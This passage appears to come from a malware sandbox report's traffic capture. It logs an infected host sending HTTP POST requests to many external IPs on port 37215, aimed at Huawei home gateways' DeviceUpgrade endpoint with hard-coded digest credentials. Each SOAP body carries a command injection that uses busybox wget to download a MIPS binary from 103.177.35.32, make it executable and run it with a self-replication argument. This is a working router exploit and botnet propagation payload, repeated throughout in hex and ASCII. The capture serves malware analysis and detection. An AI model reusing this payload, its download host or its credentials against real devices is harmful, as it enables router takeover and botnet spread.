                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        147192.168.2.2345362157.141.43.18637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.296278954 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        148192.168.2.235965241.44.50.24437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.296613932 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        149192.168.2.235526841.199.197.5237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.296627998 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        150192.168.2.2357032197.255.159.18137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.296749115 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        151192.168.2.233665241.148.161.8237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.296751976 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        152192.168.2.2339368197.114.242.25537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.296751976 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        153192.168.2.233982041.35.163.1637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.296952963 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        154192.168.2.233905841.207.168.16937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.296996117 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        155192.168.2.2352068197.50.150.11137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.297590971 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        156192.168.2.234899641.183.238.19237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.297658920 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
